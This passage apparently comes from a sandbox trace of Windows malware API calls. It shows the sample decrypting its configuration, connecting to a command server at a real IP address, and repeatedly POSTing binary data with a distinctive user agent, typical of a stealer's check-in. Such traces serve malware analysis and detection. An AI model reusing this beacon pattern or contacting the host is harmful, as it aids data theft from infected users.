phKey=0x19fcac*=0x69cfa8) returned 1 [0282.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.614] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.615] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.615] GetProcessHeap () returned 0x690000 [0282.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0282.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.616] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0282.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.617] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0282.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.618] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0282.618] GetProcessHeap () returned 0x690000 [0282.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0282.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.619] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0282.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.620] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0282.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.620] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0282.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.621] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0282.621] GetProcessHeap () returned 0x690000 [0282.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0282.621] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0282.621] GetProcessHeap () returned 0x690000 [0282.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0282.621] socket (af=2, type=1, protocol=6) returned 0x8d8 [0282.622] connect (s=0x8d8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0282.645] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0282.645] GetProcessHeap () returned 0x690000 [0282.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0282.645] GetProcessHeap () returned 0x690000 [0282.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0282.646] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.647] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.647] GetProcessHeap () returned 0x690000 [0282.647] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0282.647] GetProcessHeap () returned 0x690000 [0282.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.649] GetProcessHeap () returned 0x690000 [0282.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0282.649] GetProcessHeap () returned 0x690000 [0282.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0282.650] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.650] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.650] GetProcessHeap () returned 0x690000 [0282.650] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0282.651] GetProcessHeap () returned 0x690000 [0282.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.651] send (s=0x8d8, buf=0x6ad508*, len=242, flags=0) returned 242 [0282.652] send (s=0x8d8, buf=0x6aba40*, len=159, flags=0) returned 159 [0282.652] GetProcessHeap () returned 0x690000 [0282.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0282.652] recv (in: s=0x8d8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0282.731] GetProcessHeap () returned 0x690000 [0282.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0282.731] GetProcessHeap () returned 0x690000 [0282.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0282.732] GetProcessHeap () returned 0x690000 [0282.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0282.733] GetProcessHeap () returned 0x690000 [0282.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0282.734] closesocket (s=0x8d8) returned 0 [0282.734] GetProcessHeap () returned 0x690000 [0282.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0282.734] GetProcessHeap () returned 0x690000 [0282.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0282.735] GetProcessHeap () returned 0x690000 [0282.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0282.735] GetProcessHeap () returned 0x690000 [0282.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0282.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16d0) returned 0x8d8 [0282.738] Sleep (dwMilliseconds=0xea60) [0282.739] GetProcessHeap () returned 0x690000 [0282.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0282.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.741] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.749] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0282.755] GetProcessHeap () returned 0x690000 [0282.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0282.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.756] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.760] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.761] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.761] GetProcessHeap () returned 0x690000 [0282.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0282.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.762] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0282.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.763] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0282.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.764] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0282.764] GetProcessHeap () returned 0x690000 [0282.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0282.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.765] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.766] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.767] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.768] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.768] GetProcessHeap () returned 0x690000 [0282.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0282.768] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.768] GetProcessHeap () returned 0x690000 [0282.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0282.768] GetProcessHeap () returned 0x690000 [0282.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0282.772] GetProcessHeap () returned 0x690000 [0282.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0282.776] GetProcessHeap () returned 0x690000 [0282.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0282.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.778] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.785] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0282.794] GetProcessHeap () returned 0x690000 [0282.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0282.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.795] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0282.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.796] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.798] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.798] GetProcessHeap () returned 0x690000 [0282.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0282.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.799] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0282.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.800] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0282.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.801] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0282.801] GetProcessHeap () returned 0x690000 [0282.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0282.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.802] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0282.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.805] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0282.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.806] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0282.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.807] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0282.807] GetProcessHeap () returned 0x690000 [0282.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0282.807] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0282.807] GetProcessHeap () returned 0x690000 [0282.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0282.807] socket (af=2, type=1, protocol=6) returned 0x8dc [0282.807] connect (s=0x8dc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0282.829] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0282.829] GetProcessHeap () returned 0x690000 [0282.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0282.829] GetProcessHeap () returned 0x690000 [0282.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0282.830] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.831] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.831] GetProcessHeap () returned 0x690000 [0282.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0282.831] GetProcessHeap () returned 0x690000 [0282.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.831] GetProcessHeap () returned 0x690000 [0282.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0282.831] GetProcessHeap () returned 0x690000 [0282.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0282.832] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0282.833] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.833] GetProcessHeap () returned 0x690000 [0282.833] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0282.833] GetProcessHeap () returned 0x690000 [0282.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0282.834] send (s=0x8dc, buf=0x6ad508*, len=242, flags=0) returned 242 [0282.834] send (s=0x8dc, buf=0x6aba40*, len=159, flags=0) returned 159 [0282.835] GetProcessHeap () returned 0x690000 [0282.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0282.837] recv (in: s=0x8dc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0282.900] GetProcessHeap () returned 0x690000 [0282.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0282.900] GetProcessHeap () returned 0x690000 [0282.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0282.900] GetProcessHeap () returned 0x690000 [0282.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0282.901] GetProcessHeap () returned 0x690000 [0282.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0282.902] closesocket (s=0x8dc) returned 0 [0282.902] GetProcessHeap () returned 0x690000 [0282.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0282.902] GetProcessHeap () returned 0x690000 [0282.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0282.903] GetProcessHeap () returned 0x690000 [0282.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0282.903] GetProcessHeap () returned 0x690000 [0282.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0282.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16d4) returned 0x8dc [0282.906] Sleep (dwMilliseconds=0xea60) [0282.907] GetProcessHeap () returned 0x690000 [0282.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0282.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.909] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.916] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0282.926] GetProcessHeap () returned 0x690000 [0282.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0282.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.927] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.928] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.936] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.936] GetProcessHeap () returned 0x690000 [0282.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0282.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.938] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0282.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.939] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0282.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.940] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0282.940] GetProcessHeap () returned 0x690000 [0282.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0282.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.941] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.942] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.943] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0282.944] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.944] GetProcessHeap () returned 0x690000 [0282.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0282.944] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.944] GetProcessHeap () returned 0x690000 [0282.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0282.945] GetProcessHeap () returned 0x690000 [0282.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0282.945] GetProcessHeap () returned 0x690000 [0282.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0282.946] GetProcessHeap () returned 0x690000 [0282.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0282.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0282.997] GetProcessHeap () returned 0x690000 [0282.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0282.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.998] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0282.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0282.999] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.002] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.002] GetProcessHeap () returned 0x690000 [0283.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0283.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.008] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0283.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.010] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0283.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.013] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0283.013] GetProcessHeap () returned 0x690000 [0283.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.013] LoadLibraryW 